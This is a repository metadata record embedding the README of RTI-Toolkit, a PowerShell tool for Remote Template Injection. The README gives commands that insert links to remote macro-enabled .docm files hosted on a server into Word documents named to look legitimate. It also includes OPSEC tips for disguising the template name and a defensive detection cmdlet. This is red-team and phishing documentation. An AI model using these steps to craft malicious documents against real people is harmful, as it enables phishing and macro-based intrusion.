{"id":20068266,"url":"https://github.com/nickvourd/rti-toolkit","last_synced_at":"2025-05-05T19:31:05.024Z","repository":{"id":197086939,"uuid":"677702468","full_name":"nickvourd/RTI-Toolkit","owner":"nickvourd","description":"Remote Template Injection Toolkit","archived":false,"fork":false,"pushed_at":"2024-04-07T13:18:41.000Z","size":1975,"stargazers_count":23,"open_issues_count":0,"forks_count":4,"subscribers_count":2,"default_branch":"main","last_synced_at":"2024-04-07T20:47:21.851Z","etag":null,"topics":["initial-access","macros","microsoft","offensive-security","pentest-tool","pentesting","phishing","phishing-attacks","phishing-detection","phishing-kit","powershell","powershell-module","powershell-script","redteam","redteam-tools","redteaming","remote-template","remote-template-injection","windows"],"latest_commit_sha":null,"homepage":"","language":"PowerShell","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/nickvourd.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null}},"created_at":"2023-08-12T10:55:31.000Z","updated_at":"2024-04-07T20:47:21.852Z","dependencies_parsed_at":null,"dependency_job_id":"2364ab78-dc00-4ff2-9545-7fa61ac3732c","html_url":"https://github.com/nickvourd/RTI-Toolkit","commit_stats":null,"previous_names":["nickvourd/rti-toolkit"],"tags_count":1,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nickvourd%2FRTI-Toolkit","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nickvourd%2FRTI-Toolkit/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositori
es/nickvourd%2FRTI-Toolkit/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nickvourd%2FRTI-Toolkit/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nickvourd","download_url":"https://codeload.github.com/nickvourd/RTI-Toolkit/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":224461759,"owners_count":17315116,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["initial-access","macros","microsoft","offensive-security","pentest-tool","pentesting","phishing","phishing-attacks","phishing-detection","phishing-kit","powershell","powershell-module","powershell-script","redteam","redteam-tools","redteaming","remote-template","remote-template-injection","windows"],"created_at":"2024-11-13T14:05:56.928Z","updated_at":"2024-11-13T14:05:57.613Z","avatar_url":"https://github.com/nickvourd.png","language":"PowerShell","funding_links":[],"categories":[],"sub_categories":[],"readme":"# RTI-Toolkit\n\nRemote Template Injection Toolkit\n\n\u003cp align=\"center\"\u003e\n  \u003cimg width=\"350\" height=\"350\" src=\"https://github.com/nickvourd/RTI-Toolkit/blob/main/Pictures/injection-Logo.png\"\u003e\n\u003c/p\u003e\n\n## Description\n\nRTI-Toolkit is an open-source PowerShell toolkit for Remote Template Injection attack. 
This toolkit includes a PowerShell script named `PS-Templator.ps1` which can be used from both an attacking and defensive perspective.\n\nThe following table presents the main modules (cmdlets) of `PS-Templator.ps1`:\n\n| Cmdlet | Description | Perspective |\n| -------|:-----------:|:-----------:|\n| [Invoke-Template](#invoke-template) | Implements remote template links within default Office Word templates  | Attacking |\n| [Invoke-Regular](#invoke-regular) | Implements remote template links within regular Office Word documents without template | Attacking |\n| [Invoke-Identify](#invoke-identify) | Identifies remote template links within Office Word docx documents with/without template | Defensive |\n\n⚠️ `PS-Templator.ps1` supports only DOCX files.\n\n## Version\n\n### 1.0.0\n\n## License\n\nThis tool is licensed under the [![License: MIT](https://img.shields.io/badge/MIT-License-yellow.svg)](LICENSE).\n\n## Acknowledgement\n\nSpecial thanks to my friends [@Papadope9](https://twitter.com/Papadope9) and [Stavros Gkounis (a.k.a purpl3ph03n1x)](https://www.linkedin.com/in/stavros-gkounis-603026a6/), who provided invaluable assistance during the beta testing phase of the tool.\n\nThis tool was inspired during an iCAST Red Teaming Assessment with [@S1ckB0y1337](https://twitter.com/S1ckB0y1337) a few years ago.\n\nSupernova was created with ❤️ by [@nickvourd](https://twitter.com/nickvourd).\n\n## Table of Contents\n- [RTI-Toolkit](#rti-toolkit)\n  - [Description](#description)\n  - [Version](#version)\n  - [License](#license)\n  - [Acknowledgement](#acknowledgement)\n  - [Table of Contents](#table-of-contents)\n  - [Remote Template Injection (RTI)](#remote-template-injection-rti)\n  - [Installation](#installation)\n  - [Cmdlets](#cmdlets)\n    - [Invoke-Template](#invoke-template)\n      - [Invoke-Template Example](#invoke-template-example)\n    - [Invoke-Regular](#invoke-regular)\n      - [Invoke-Regular Example](#invoke-regular-example)\n      - [Invoke-Regular 
Example 2](#invoke-regular-example-2)\n    - [Invoke-Identify](#invoke-identify)\n      - [Invoke-Identify Example](#invoke-identify-example)\n      - [Invoke-Identify Example 2](#invoke-identify-example-2)\n  - [References](#references)\n\n## Remote Template Injection (RTI)\n\nRemote Template Injection (RTI) in the context of Microsoft Office refers to a specific type of security vulnerability that can be exploited through malicious templates in Office documents (e.g., Word, Excel, PowerPoint).\n\nFor example, in a DOCX file, the content is stored in XML format within the archive, and some of these XML files may reference external resources or templates. Attackers can indeed manipulate these XML files to insert malicious links or content that can potentially exploit vulnerabilities or deceive users. \n\nThis is a Macro-Based attack.\n\n## Installation\n\nTo load `PS-Templator.ps1` as a module into memory, run the following command:\n```\nImport-Module .\\PS-Templator.ps1\n```\n\n:information_source: `PS-Templator.ps1` works without the necessity of installing any additional dependencies.\u003cbr /\u003e\u003cbr /\u003e\n:information_source: `PS-Templator.ps1` works as a PowerShell module.\u003cbr /\u003e\u003cbr /\u003e\n:information_source: `PS-Templator.ps1` was tested on a Windows 10 machine with Office 2019 Professional Plus.\n\n## Cmdlets\n\n### Invoke-Template\n\n`Invoke-Template` is a cmdlet that implements remote template links within default Office Word templates.\n\n#### Invoke-Template Example\n\nAssuming that you have a default Word template, such as one of these:\n\n![All Words Templates](/Pictures/All-Word-Templates.png)\n\nSaved as, for example, 'Name.docx':\n\n![Default Word Template Document](/Pictures/Default-Word-Template.png)\n\nIf you use the `Invoke-Template` cmdlet, you can insert a malicious link within this docx:\n\n⚠️ Before running `Invoke-Template`, please make sure to save the document and close it (terminate its process).\n\n```\nInvoke-Template 
-InputDoc Name.docx -Link \"https://192.168.1.3:8080/Doc1.docm\" -Output C:\\Users\\User\\Desktop\\LegitDocument.docx\n```\n\nOutcome:\n\n![Invoke-Template-1](/Pictures/Invoke-Template-1.png)\n\nAs you can see, the Invoke-Template module keeps a backup of the original document and provides the full path to the malicious document.\n\nFrom a debugging perspective, if you convert the malicious docx to a zip archive and go into /word/_rels/settings.xml.rels, you can see the malicious link:\n\n![Invoke-Template-Debug](/Pictures/Invoke-Template-Debug.png)\n\n### Invoke-Regular\n\n`Invoke-Regular` is a cmdlet that implements remote template links within default Office Word documents without templates.\n\n#### Invoke-Regular Example\n\nAssuming that you have a default Word document without a template, like this:\n\n![Blank Document](/Pictures/Blank-Document.png)\n\nSaved as, for example, 'Doc1.docx':\n\n![Word Document](/Pictures/Word-Document.png)\n\nIf you use the `Invoke-Regular` cmdlet, you can insert a malicious link within this docx:\n\n⚠️ Before running `Invoke-Regular`, please make sure to save the document and close it (terminate its process).\n\n```\nInvoke-Regular -InputDoc C:\\Users\\User\\Desktop\\Doc1.docx -Link \"http://192.168.1.3:8080/Doc1.docm\" -Output Nikos2.docx\n```\n\nOutcome:\n\n![Invoke-Regular-1](/Pictures/Invoke-Regular-1.png)\n\nAs you can see, the Invoke-Regular module keeps a backup of the original document and provides the full path to the malicious document.\n\nFrom a debugging perspective, if you convert the malicious docx to a zip archive and go into /word/_rels/settings.xml.rels, you can see the malicious link:\n\n![Invoke-Regular-Debug-1](/Pictures/Invoke-Regular-Debug-1.png)\n\n#### Invoke-Regular Example 2\n\nFrom an OPSEC perspective, you can use `-TemplateName` in conjunction with the `Invoke-Regular` module. 
This will make your malicious document appear more legitimate if someone tries to analyze it.\n\nHere is an example:\n\n```\nInvoke-Regular -InputDoc C:\\Users\\User\\Desktop\\Doc1.docx -Link \"http://192.168.1.3:8080/Doc1.docm\" -Output Legittemplate.dotx\n```\n\nOutcome:\n\n![Invoke-Regular-Example-2](/Pictures/Invoke-Regular-Example2.png)\n\nFrom a debugging perspective, if you convert the malicious docx to a zip archive and go into /docProps/app.xml, you can see the fake template name:\n\n![Invoke-Regular-Fake-Template-Name](/Pictures/Invoke-Regular-Fake-Template-Name.png)\n\n### Invoke-Identify\n\n`Invoke-Identify` is a cmdlet that identifies remote template links within Office Word docx documents with/without template.\n\n#### Invoke-Identify Example\n\nAssuming that you have a malicious Word document:\n\n```\nInvoke-Identify -InputDoc LegitDocument.docx -Output C:\\Users\\User\\Desktop\\output.txt\n```\n\nOutcome:\n\n![Invoke-Identify Malicious Example](/Pictures/Invoke-Identify-Malicious-Example.png)\n\n#### Invoke-Identify Example 2\n\nAssuming that you have a non-malicious Word document:\n\n```\nInvoke-Identify -InputDoc Name.docx -Output C:\\Users\\User\\Desktop\\output2.txt\n```\n\nOutcome:\n\n![Invoke-Identify Clean Example](/Pictures/Invoke-Identify-Clean-Example.png)\n\n## References\n- [ired.team](https://www.ired.team/offensive-security/initial-access/phishing-with-ms-office/inject-macros-from-a-remote-dotm-template-docx-with-macros)\n- [dmcxblue.gitbook.io](https://dmcxblue.gitbook.io/red-team-notes-2-0/red-team-techniques/defense-evasion/t1221-template-injection)\n- [john-woodman.com](https://john-woodman.com/research/vba-macro-remote-template-injection/)\n- [remoteInjector GitHub by John Woodman](https://github.com/JohnWoodman/remoteInjector)\n- [Invoke-Templator GitHub by Outflanknl](https://github.com/outflanknl/Invoke-Templator)\n- [attack.mitre.org](https://attack.mitre.org/techniques/T1221/)\n- [BadAssMacros GitHub by 
Inf0secRabbit](https://github.com/Inf0secRabbit/BadAssMacros)\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fnickvourd%2Frti-toolkit","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fnickvourd%2Frti-toolkit","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fnickvourd%2Frti-toolkit/lists"}